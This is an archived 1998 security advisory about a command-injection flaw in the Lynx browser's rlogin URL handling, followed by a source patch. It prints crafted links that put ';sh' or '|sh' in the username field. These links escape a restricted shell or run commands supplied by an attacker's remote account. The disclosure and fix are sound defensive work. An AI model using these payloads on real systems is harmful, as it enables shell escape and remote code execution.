Lynx has a feature that allows trojans. For users on systems where lynx is the login shell or somehow the only program allowed to run, the user can obtain a shell by simply "clicking" a link that looks like this: <a href="rlogin://foo;sh@foo">foo</a>. Running hostile code is also easy with this feature: <a href="rlogin://eviluser|shat_private">foo</a>. The login shell (or something similiar) for eviluserat_private prints out a few commands to run on the victim. The problem is in WWW/Library/Implementation/HTTelnet.c in the function remote_session. It strips off "bad" characters ('|', ';') from everything except the username: /* * Modified to allow for odd chars in a username only if exists. * 05-28-94 Lynx 2-3-1 Garrett Arch Blythe */ That was a bad decision. The obvious fix is to be more paranoid than "user friendly". //art (diff made to the OpenBSD cvs repository, so the line numbers can be wrong) Index: HTTelnet.c =================================================================== RCS file: /cvs/src/gnu/usr.bin/lynx/WWW/Library/Implementation/HTTelnet.c,v retrieving revision 1.1.1.1 diff -u -w -u -r1.1.1.1 HTTelnet.c --- HTTelnet.c 1998/03/11 17:47:47 1.1.1.1 +++ HTTelnet.c 1998/11/16 17:01:35 @@ -73,8 +73,7 @@ * *cp=0; / * terminate at any ;,<,>,`,|,",' or space or return * or tab to prevent security whole */ - for(cp = (strchr(host, '@') ? strchr(host, '@') : host); *cp != '\0'; - cp++) { + for(cp = host; *cp != '\0'; cp++) { if(!isalnum(*cp) && *cp != '_' && *cp != '-' && *cp != ':' && *cp != '.' && *cp != '@') { *cp = '\0';
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:23:40 PDT